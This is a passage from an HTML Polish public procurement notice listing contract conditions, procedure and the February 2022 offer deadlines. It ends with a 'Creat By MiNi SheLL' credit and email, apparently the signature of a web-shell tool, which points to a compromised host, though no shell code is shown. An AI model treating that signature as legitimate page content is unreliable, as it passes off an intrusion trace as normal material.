postępowaniu<br/>zamieszcza informacje o podwykonawcach w oświadczeniu o niepodleganiu wykluczeniu.<br/>e) Zamawiający dokona oceny spełniania w/w warunków.<br/>f) Ocena spełniania warunków udziału w postępowaniu dokonywana będzie w oparciu o<br/>oświadczenia / dokumenty złożone w niniejszym postępowaniu według kryterium: spełnia – nie<br/>spełnia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-02-17 10:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Za pośrednictwem Formularza do złożenia, zmiany, wycofania oferty lub wniosku dostępnego na ePUAP i udostępnionego również na miniPortalu.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-02-17 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com